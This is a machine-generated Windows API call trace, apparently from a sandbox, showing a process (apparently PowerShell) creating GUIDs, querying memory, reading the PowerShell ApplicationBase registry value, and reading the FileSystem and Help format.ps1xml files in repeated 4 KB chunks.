	[0298.570] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x666b51e0, Data2=0x33ba, Data3=0x4491, Data4=([0]=0x82, [1]=0x2, [2]=0xdb, [3]=0x3a, [4]=0x9e, [5]=0x7, [6]=0x4d, [7]=0xf6))) returned 0x0
	[0298.570] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x38253903, Data2=0x8f43, Data3=0x4a03, Data4=([0]=0x92, [1]=0xe2, [2]=0x2a, [3]=0x69, [4]=0x1d, [5]=0xd6, [6]=0xfa, [7]=0x80))) returned 0x0
	[0298.570] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x45124d88, Data2=0x129e, Data3=0x48d0, Data4=([0]=0xa8, [1]=0x1c, [2]=0x3a, [3]=0x74, [4]=0x74, [5]=0x2, [6]=0x1a, [7]=0xb0))) returned 0x0
	[0298.570] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.570] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.570] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.571] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x8ac45a60, Data2=0x97e1, Data3=0x43c4, Data4=([0]=0xbb, [1]=0x9e, [2]=0x55, [3]=0x92, [4]=0x66, [5]=0x5f, [6]=0x15, [7]=0xf8))) returned 0x0
	[0298.571] SetErrorMode (uMode=0x1) returned 0x1
	[0298.571] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0298.588] GetFileType (hFile=0x300) returned 0x1
	[0298.588] SetErrorMode (uMode=0x1) returned 0x1
	[0298.588] GetFileType (hFile=0x300) returned 0x1
	[0298.588] ReadFile (in: hFile=0x300, lpBuffer=0x2e918c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2e918c8*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.589] ReadFile (in: hFile=0x300, lpBuffer=0x2e918c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2e918c8*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.589] ReadFile (in: hFile=0x300, lpBuffer=0x2e918c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2e918c8*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.590] ReadFile (in: hFile=0x300, lpBuffer=0x2e918c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2e918c8*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.590] ReadFile (in: hFile=0x300, lpBuffer=0x2e918c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2e918c8*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.590] ReadFile (in: hFile=0x300, lpBuffer=0x2e918c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2e918c8*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.590] ReadFile (in: hFile=0x300, lpBuffer=0x2e918c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2e918c8*, lpNumberOfBytesRead=0x1cd398*=0x119, lpOverlapped=0x0) returned 1
	[0298.590] ReadFile (in: hFile=0x300, lpBuffer=0x2e918c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2e918c8*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0298.590] SetErrorMode (uMode=0x1) returned 0x1
	[0298.590] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd340 | out: lpFileInformation=0x1cd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0298.591] SetErrorMode (uMode=0x1) returned 0x1
	[0298.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0298.591] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd428 | out: phkResult=0x1cd428*=0x300) returned 0x0
	[0298.591] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd3ac, lpData=0x0, lpcbData=0x1cd3a8*=0x0 | out: lpType=0x1cd3ac*=0x1, lpData=0x0, lpcbData=0x1cd3a8*=0x56) returned 0x0
	[0298.591] CoTaskMemAlloc (cb=0x5a) returned 0x1b830740
	[0298.591] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd37c, lpData=0x1b830740, lpcbData=0x1cd378*=0x56 | out: lpType=0x1cd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd378*=0x56) returned 0x0
	[0298.591] CoTaskMemFree (pv=0x1b830740) 
	[0298.591] RegCloseKey (hKey=0x300) returned 0x0
	[0298.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0298.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0298.592] VirtualQuery (in: lpAddress=0x1cbec0, lpBuffer=0x1ccd80, dwLength=0x30 | out: lpBuffer=0x1ccd80*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.592] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xfd118d8b, Data2=0x437a, Data3=0x4be5, Data4=([0]=0xa6, [1]=0xee, [2]=0xf3, [3]=0x2, [4]=0x49, [5]=0xa, [6]=0x81, [7]=0x3d))) returned 0x0
	[0298.592] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.592] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xa6ca0fb2, Data2=0x43ce, Data3=0x432e, Data4=([0]=0x8e, [1]=0xc5, [2]=0x5a, [3]=0xda, [4]=0x84, [5]=0x44, [6]=0x80, [7]=0xe8))) returned 0x0
	[0298.592] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x777672ea, Data2=0xf96f, Data3=0x409e, Data4=([0]=0xad, [1]=0xf4, [2]=0x6a, [3]=0x7f, [4]=0x30, [5]=0xa8, [6]=0x41, [7]=0x92))) returned 0x0
	[0298.593] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xda9c69e3, Data2=0xc7d2, Data3=0x4b40, Data4=([0]=0xaa, [1]=0x44, [2]=0x41, [3]=0x37, [4]=0xd3, [5]=0xcc, [6]=0xff, [7]=0x15))) returned 0x0
	[0298.593] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.593] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.593] SetErrorMode (uMode=0x1) returned 0x1
	[0298.593] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0298.593] GetFileType (hFile=0x300) returned 0x1
	[0298.593] SetErrorMode (uMode=0x1) returned 0x1
	[0298.593] GetFileType (hFile=0x300) returned 0x1
	[0298.593] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.593] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.594] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.594] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.594] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.594] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.594] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.594] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.595] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.595] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.595] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.596] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.596] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.596] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.596] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.596] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.598] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.598] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.598] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.598] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.598] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.599] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.599] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.599] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.599] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.599] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.600] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.600] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.600] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.600] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.600] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.601] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.608] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.609] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.609] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.609] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.609] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.609] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.610] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.610] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.610] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.610] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.610] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.610] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.611] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.611] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.611] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.611] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.611] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.611] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.611] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.612] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.612] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.612] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.612] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.612] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.612] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.612] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.613] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.613] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.613] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
